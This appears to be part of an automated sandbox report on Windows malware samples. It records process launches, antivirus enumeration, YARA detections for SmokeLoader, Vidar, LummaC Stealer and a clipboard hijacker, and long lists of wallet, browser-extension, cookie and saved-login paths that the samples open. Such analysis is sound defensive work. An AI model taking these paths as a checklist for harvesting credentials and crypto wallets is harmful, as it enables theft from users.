Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart

Source: explorer.exe, 00000027.00000002.2617948795.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanl
Source: explorer.exe, 00000002.00000000.1427638548.0000000001081000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1428819383.0000000004460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1431282200.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1427638548.0000000001081000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000049D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2076060809.00000000049D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1427638548.0000000001081000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: explorer.exe, 00000002.00000000.1427348032.0000000000889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000002.00000000.1427638548.0000000001081000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000027.00000003.2076060809.00000000048BA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2625226237.00000000048BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndw

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 8_2_049780F6 cpuid

8_2_049780F6

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	8_2_04983F87
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	8_2_0497C8B7
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	8_2_049849EA
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	8_2_0498394D
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	8_2_04990AB6
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	9_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	9_2_00438178
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	9_2_00440116
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	9_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	9_2_00438423
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: EnumSystemLocalesW,	9_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: GetLocaleInfoW,	9_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	9_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	9_2_00432FAD
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	9_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	9_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: EnumSystemLocalesW,	9_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	9_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	9_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	9_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	9_2_00437F83
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	13_2_04913F87
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	13_2_0490C8B7
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	13_2_049149EA
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	13_2_0491394D
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	13_2_04920AB6

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 8_2_004063F9 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

8_2_004063F9

Source: C:\Users\user\AppData\Local\Temp\1601.exe

9_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

9_2_0042FE47

Source: C:\Users\user\AppData\Local\Temp\1601.exe

9_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iles%\Windows Defender\MsMpeng.exe
Source: build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000002.2020982670.0000000001597000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1994160250.0000000001597000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1957921192.0000000001588000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1956070749.0000000001585000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1995878143.0000000001597000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1956070749.0000000001597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\455F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 25.2.build3.exe.9215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 455F.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1443235226.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1682396136.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1682358139.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 18.2.build2.exe.a015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.build2.exe.a015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2287228950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1803333267.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 2636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7712, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 455F.exe, 00000014.00000003.1996089529.000000000151E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: 455F.exe, 00000014.00000003.1996089529.000000000151E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: 455F.exe, 00000014.00000003.1996089529.000000000151E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 455F.exe, 00000014.00000003.1996089529.000000000151E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: 455F.exe, 00000014.00000003.1889817325.00000000014FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinancetFx
Source: 455F.exe, 00000014.00000003.1996089529.000000000151E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: 455F.exe, 00000014.00000003.1994160250.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 455F.exe, 00000014.00000003.1994160250.0000000001561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: 455F.exe, 00000014.00000002.2019271007.00000000014FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\455F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
